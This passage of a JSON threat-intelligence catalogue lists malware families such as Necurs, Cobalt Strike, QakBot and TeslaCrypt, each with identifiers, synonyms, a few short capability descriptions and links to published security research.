"http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
"https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/",
"http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf"
]
}
},
{
"uuid": "fa278536-8293-4717-86b5-8a03aa11063f",
"value": "Buhtrap",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/"
]
}
},
{
"uuid": "66862f1a-5823-4a9a-bd80-439aaafc1d8b",
"value": "MacRansom",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x1E.html",
"https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service"
]
}
},
{
"uuid": "0ec7d065-3418-43ba-a0cc-1e06471893ad",
"value": "Nagini",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/"
]
}
},
{
"uuid": "25a280b2-0260-4593-bf8c-7062dfdc6c38",
"value": "OpGhoul",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/"
]
}
},
{
"uuid": "243ae1f7-183e-4ea9-82cf-3353a0ef78f4",
"value": "Medre",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html"
]
}
},
{
"uuid": "515ee69a-298a-4fcf-bdb0-c5fc6d41872f",
"value": "Shylock",
"description": "",
"meta": {
"synonyms": [
"Caphaw"
],
"type": [],
"refs": [
"https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/",
"http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html",
"https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/",
"https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/",
"https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware",
"https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw"
]
}
},
{
"uuid": "af35e295-7087-4f6c-9f70-a431bf223822",
"value": "ShellLocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/813726714228604928"
]
}
},
{
"uuid": "15daa766-f721-4fd5-95fb-153f5361fb87",
"value": "Leverage",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis",
"https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/"
]
}
},
{
"uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb",
"value": "Necurs",
"description": "",
"meta": {
"synonyms": [
"nucurs"
],
"type": [],
"refs": [
"https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs",
"https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features",
"http://blog.talosintelligence.com/2017/03/necurs-diversifies.html",
"https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf",
"https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors",
"https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/"
]
}
},
{
"uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d",
"value": "Philadephia Ransom",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/",
"https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html",
"https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware",
"https://blogs.forcepoint.com/security-labs/shelf-ransomware-used-target-healthcare-sector",
"https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/"
]
}
},
{
"uuid": "dc39dcdf-50e7-4d55-94a0-926853f344f3",
"value": "Evilbunny",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cyphort.com/evilbunny-malware-instrumented-lua/",
"https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope"
]
}
},
{
"uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550",
"value": "Cobalt Strike",
"description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon provides the attacker with a wealth of functionality, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html",
"https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
"https://www.lac.co.jp/lacwatch/people/20180521_001638.html",
"https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/"
]
}
},
{
"uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06",
"value": "win.medusa",
"description": "Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/",
"https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/",
"https://news.drweb.com/show/?i=10302&lng=en",
"https://webcache.googleusercontent.com/search?q=cache:ZbKznF-dogcJ:https://www.toolbase.me/board/topic/10061-b-medusa-irc-ddos-botnet-bypass-cf-cookie-protections/"
]
}
},
{
"uuid": "fa0ffc56-6d82-469e-b624-22882f194ce9",
"value": "HappyLocker (HiddenTear?)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "978cfb82-5fe9-46d2-9607-9bcdfeaaa58c",
"value": "win.glupteba",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://resources.infosecinstitute.com/tdss4-part-1/",
"http://malwarefor.me/2015-04-13-nuclear-ek-glupteba-and-operation-windigo/",
"https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/",
"https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/",
"https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/"
]
}
},
{
"uuid": "54327cbd-d30c-4684-9a66-18ae36b28399",
"value": "PoohMilk Loader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/",
"http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html"
]
}
},
{
"uuid": "87a45a07-30d7-4223-ae61-6b1e6dde0f5a",
"value": "Romeo(Alfa,Bravo, ...)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "b255fd2c-6ddb-452f-b660-c9f5d3a2ff63",
"value": "xsPlus",
"description": "",
"meta": {
"synonyms": [
"nokian"
],
"type": [],
"refs": [
"https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf",
"https://securelist.com/analysis/publications/69953/the-naikon-apt/",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
]
}
},
{
"uuid": "80487bca-7629-4cb2-bf5b-993d5568b699",
"value": "Bouncer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "150cde2c-ae36-4fa5-8d8d-8dedc3de43de",
"value": "Combojack",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/03/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/"
]
}
},
{
"uuid": "acd8fc63-c22a-4c11-907e-33e358fdd293",
"value": "StarCruft",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/operation-daybreak/75100/"
]
}
},
{
"uuid": "b88b50c0-3db9-4b8f-8564-4f56f991bee2",
"value": "Ruckguv",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear"
]
}
},
{
"uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6",
"value": "DuQu",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf"
]
}
},
{
"uuid": "bc0c1e48-102c-4e6b-9b86-c442c4798159",
"value": "CryptoWire",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/"
]
}
},
{
"uuid": "95b454f6-8ffb-4ef7-8a91-14d48601a899",
"value": "BfBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "098cfb93-8921-48f0-a694-a83f350e8a61",
"value": "Chinad",
"description": "Adware that shows advertisements using plugin techniques for popular browsers",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "96a695de-2560-4f10-bbd6-3bc2ac27b7f7",
"value": "AvastDisabler",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/"
]
}
},
{
"uuid": "929112e4-e252-4273-b3c2-fd414cfb2776",
"value": "Lurk",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader"
]
}
},
{
"uuid": "4df1b257-c242-46b0-b120-591430066b6f",
"value": "POSHSPY",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html",
"https://github.com/matthewdunwoody/POSHSPY"
]
}
},
{
"uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a",
"value": "IsSpace",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/"
]
}
},
{
"uuid": "2ccaccd0-8362-4224-8497-2012e7cc7549",
"value": "QakBot",
"description": "",
"meta": {
"synonyms": [
"Pinkslipbot",
"Qbot"
],
"type": [],
"refs": [
"https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/",
"https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/",
"http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf",
"http://contagiodump.blogspot.com/2010/11/template.html",
"https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf",
"https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html",
"https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf"
]
}
},
{
"uuid": "b602edb3-81c2-4772-b5f8-73deb85cb40a",
"value": "Silon",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm",
"http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html"
]
}
},
{
"uuid": "808445e6-f51c-4b5d-a812-78102bf60d24",
"value": "Tater PrivEsc",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/Kevin-Robertson/Tater"
]
}
},
{
"uuid": "8804e02c-a139-4c3d-8901-03302ca1faa0",
"value": "JadeRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.lookout.com/mobile-threat-jaderat"
]
}
},
{
"uuid": "7d480f11-3de8-463d-8a19-54685c8b9e0f",
"value": "Stealth Mango",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.lookout.com/info/stealth-mango-report-ty"
]
}
},
{
"uuid": "acdda3e5-e776-419b-b060-14f3406de061",
"value": "WebC2-DIV",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "bd79d5be-5c2f-45c1-ac99-0e755a61abad",
"value": "TeslaCrypt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blogs.cisco.com/security/talos/teslacrypt",
"https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/",
"https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/",
"https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/",
"https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf",
"https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/",
"https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack"
]
}
},
{
"uuid": "47b67fa4-f32e-4b6b-a32d-42c5ca0b8e9a",
"value": "Wirenet",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html",
"https://news.drweb.com/show/?i=2679&lng=en&c=14"
]
}
},
{
"uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405",
"value": "Mughthesec",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x20.html"
]
}
},
{
"uuid": "5e362cd1-bc5c-4225-b820-00ec7ebebadd",
"value": "Uiwix",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue"
]
}
},
{
"uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2",
"value": "Goggles",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "bdb27944-1f79-46f7-a0d7-c344429790c2",
"value": "Maktub",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/",
"https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html",
"https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/"
]
}
},
{
"uuid": "39002a0d-99aa-4568-b110-48f6df1759cd",
"value": "Skyplex",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846",
"value": "Slingshot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/apt-slingshot/84312/",
"https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf",
"https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/"
]
}
},
{
"uuid": "65b7eff4-741c-445e-b4e0-8a4e4f673a65",
"value": "OceanLotus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update",
"https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
"https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/"
]
}
},
{
"uuid": "383021b9-fcf9-4c21-a0e2-d75fb8c0727a",
"value": "Rincux",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c",
"value": "BetaBot",
"description": "",
"meta": {
"synonyms": [
"Neurevt"
],
"type": [],
"refs": [
"https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39",
"https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html",
"http://www.xylibox.com/2015/04/betabot-retrospective.html",
"http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref",
"https://www.arbornetworks.com/blog/asert/beta-bot-a-code-review/",
"https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en",
"http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html"
]
}
},
{
"uuid": "947dffa1-0184-48d4-998e-1899ad97e93e",
"value": "Babar",
"description": "",
"meta": {
"synonyms": [
"SNOWBALL"
],
"type": [],
"refs": [
"http://www.spiegel.de/media/media-35683.pdf",
"https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/",
"https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/",
"https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope",
"https://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/"
]
}
},
{
"uuid": "27d90cd6-095a-4c28-a6f2-d1b47eae4f70",
"value": "Alina POS",
"description": "",
"meta": {
"synonyms": [
"alina_spark",
"katrina",
"alina_eagle"
],
"type": [],
"refs": [
"http://www.xylibox.com/2013/02/alina-34-pos-malware.html",
"https://www.nuix.com/blog/alina-continues-spread-its-wings",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/"
]
}
},
{
"uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840",
"value": "Vobfus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html",
"https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/"
]
}
},
{
"uuid": "cd201689-4bf1-4c5b-ac4d-21c4dcc39e7d",
"value": "Pony",
"description": "",
"meta": {
"synonyms": [
"Fareit"
],
"type": [],
"refs": [
"https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf",
"https://github.com/nyx0/Pony"
]
}
},
{
"uuid": "137cde28-5c53-489b-ad0b-d0fa2e342324",
"value": "Banjori",
"description": "",
"meta": {
"synonyms": [
"MultiBanker 2",
"BankPatch",
"BackPatcher"
],
"type": [],
"refs": [
"http://blog.kleissner.org/?p=69",
"http://blog.kleissner.org/?p=192",
"https://www.johannesbader.ch/2015/02/the-dga-of-banjori/"
]
}
},
{
"uuid": "b71f1656-975a-4daa-8109-00c30fd20410",
"value": "TeleDoor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintelligence.com/2017/07/the-medoc-connection.html",
"https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/"
]
}
},
{
"uuid": "2713a763-33fa-45ce-8552-7dd12b6b8ecc",
"value": "Hacksfase",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9",
"value": "HackSpy",
"description": "Py2Exe-based tool, as found on GitHub.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/ratty3697/HackSpy-Trojan-Exploit"
]
}
},
{
"uuid": "1dfd3ba6-7f82-407f-958d-c4a2ac055123",
"value": "Bart",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "9ad28356-184c-4f02-89f5-1b70981598c3",
"value": "Fireball",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/"
]
}
},
{
"uuid": "f1decba9-6b3b-4636-a2b6-2208e178591a",
"value": "StarLoader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments"
]
}
},
{
"uuid": "42760c2c-bf00-4ace-871c-6dcbbd90b2de",
"value": "MadMax",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/mad-max-dga/"
]
}
},
{
"uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa",
"value": "scanbox",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks",
"http://resources.infosecinstitute.com/scanbox-framework/"
]
}
},
{
"uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf",
"value": "X-Agent",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/",
"https://twitter.com/PhysicalDrive0/status/845009226388918273",
"https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf"
]
}
},
{
"uuid": "6f6da371-2d62-4245-9aa3-8570e39222ae",
"value": "Mirage",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/"
]
}
},
{
"uuid": "1bf03bbb-d3a2-4713-923b-218186c86914",
"value": "FastPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/",
"http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf",
"http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf"
]
}
},
{
"uuid": "4f5c2f8b-06ef-4fb3-b03c-afdcafa88de5",
"value": "ArdaMax",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "4c74c8e1-869e-46a5-b050-e5a551484adc",
"value": "Razy",
"description": "",
"meta": {
"synonyms": [
"xcmkds"
],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/816915354698076161"
]
}
},
{
"uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6",
"value": "Catelites",
"description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or malvertising. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services, and asks for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang",
"https://www.youtube.com/watch?v=1LOy0ZyjEOk"
]
}
},
{
"uuid": "d53e96c5-abfa-4be4-bb33-0a898c5aff58",
"value": "Unidentified 038",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "e089e945-a523-4d11-a135-396f9b6c1dc7",
"value": "ShadowPad",
"description": "",
"meta": {
"synonyms": [
"XShellGhost"
],
"type": [],
"refs": [
"https://securelist.com/shadowpad-in-corporate-networks/81432/",
"https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf",
"http://www.dailysecu.com/?mod=bbs&act=download&bbs_id=bbs_10&upload_idxno=4070"
]
}
},
{
"uuid": "b662c253-5c87-4ae6-a30e-541db0845f67",
"value": "Vawtrak",
"description": "",
"meta": {
"synonyms": [
"NeverQuest"
],
"type": [],
"refs": [
"http://thehackernews.com/2017/01/neverquest-fbi-hacker.html",
"https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak",
"https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf"
]
}
},
{
"uuid": "4b2ab902-811e-4b50-8510-43454d77d027",
"value": "Crisis",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?",
"http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html",
"https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines"
]
}
},
{
"uuid": "f28fa5ca-9466-410c-aa32-4bd102f3f0e1",
"value": "BadNews",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1",
"https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf",
"https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/",
"https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
"http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2"
]
}
},
{
"uuid": "799921d7-48e8-47a6-989e-487b527af37a",
"value": "Unidentified 032",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/"
]
}
},
{
"uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3",
"value": "BONDUPDATER",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2"
]
}
},
{
"uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419",
"value": "POWRUNER",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2"
]
}
},
{
"uuid": "7c6ed154-3232-4b7a-80c3-8052ce0c7333",
"value": "Netrepser",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/"
]
}
},
{
"uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13",
"value": "DogHousePower",
"description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on GitHub.",
"meta": {
"synonyms": [
"Shelma"
],
"type": [],
"refs": [
"http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf"
]
}
},
{
"uuid": "b39ffc73-db5f-4a8a-acd2-bee958d69155",
"value": "Pushdo",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf",
"http://malware-traffic-analysis.net/2017/04/03/index2.html",
"https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/"
]
}
},
{
"uuid": "8611f656-b0d8-4d16-93f0-c699f2af9b7a",
"value": "Royal DNS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/nccgroup/Royal_APT",
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
]
}
},
{
"uuid": "6bd20349-1231-4aaa-ba2a-f4b09d3b344c",
"value": "Seduploader",
"description": "",
"meta": {
"synonyms": [
"jhuhugit",
"jkeyskw",
"carberplike",
"downrage"
],
"type": [],
"refs": [
"https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/",
"https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html",
"https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/",
"http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf",
"http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html",
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
